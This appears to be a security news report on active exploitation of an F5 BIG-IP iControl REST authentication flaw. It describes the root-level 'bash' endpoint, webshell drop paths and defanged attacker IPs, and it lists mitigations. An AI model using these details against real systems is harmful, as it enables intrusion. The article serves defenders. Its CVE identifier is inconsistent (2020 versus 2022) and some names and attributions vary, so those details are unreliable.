Hackers Actively Exploit F5 BIG-IP Bug

Threat actors have started exploiting a critical bug in the application service provider F5’s BIG-IP modules after a working exploit of the vulnerability was publicly made available.

The critical vulnerability, tracked as CVE-2020-1388, allows unauthenticated attackers to launch “arbitrary system commands, create or delete files, or disable services” on its BIG-IP systems.

Those patches and mitigation methods, released by F5, mitigate vulnerable BIG-IP iControl modules tied to the representational state transfer (REST) authentication component. If left unpatched, a hacker can exploit weaknesses to execute commands with root system privileges.

“This issue allows attackers with access to the management interface to basically pretend to be an administrator due to a flaw in how the authentication is implemented,” said Aaron Portnoy, director of research and development, Randori.

“Once you are an admin, you can interact with all the endpoints the application provides, including execute code” Portnoy added.

A shodan query shared by security researcher Jacob Baines revealed thousands of exposed BIG-IP systems on the internet, which an attacker can leverage to exploit remotely.

Actively Exploited

In the past 24 hours, security researchers announced that they had created the working exploit of the vulnerability, and images related to proof-of-exploit code for CVE-2020-1388 started flooding Twitter.

The exploits are publicly available, and security researchers show how hackers can use the exploit by sending just two commands and some headers to target and access an F5 application endpoint named “bash” which is exposed to the internet.

The function of this endpoint is to provide an interface for running user-supplied input as a bash command with root privileges.

Germán Fernández, a security researcher at Cronup, revealed that hackers are dropping PHP webshells to “/tmp/f5.sh” and installing them to “/usr/local/www/xui/common/css/”. Attacks show the threat actors using the addresses 216[.]162.206[.]213 and 209[.]127.252[.]207 for dropping the payload. The payload is executed and removed from the system after installation.

The exploit can also work when no password is supplied, as disclosed by Will Dormann, vulnerability analyst at the CERT/CC.

Some of the exploitation attempts did not target the management interface as observed by Kevin Beaumont, he added that “If you configured F5 box as a load balancer and firewall via self IP it is also vulnerable so this may get messy.”

The easiness of the exploit and the common term for the vulnerable endpoint ‘bash’ which is a popular Linux shell raises suspicion among security researchers as they believe it did not end up in the product by mistake.

“The CVE-2022-1388 vulnerability is surely an honest mistake by an F5 developer, right?” added researcher Will Doorman.

“I’m not entirely unconvinced that this code wasn’t planted by a developer performing corporate espionage for an incident response firm as some sort of revenue guarantee scheme,” said Jake Williams, a vulnerability analyst at the CERT/CC in a tweet.

Apply Patches Immediately

Administrators are advised to strictly follow the guidelines and install the available patches immediately, as well as remove access to the management interface over the public internet.

• Block all access to the iControl REST interface
• Restrict iControl REST access
• Modify BIG-IP httpd configuration

The detailed advisory is released by F5 with all the patches and mitigations, the researcher at Randori attack surface management released the Bash code that helps to determine whether an instance is exploitable to CVE-2020-1388 or not.

Reported By: Sagar Tiwari, an independent security researcher and technical writer.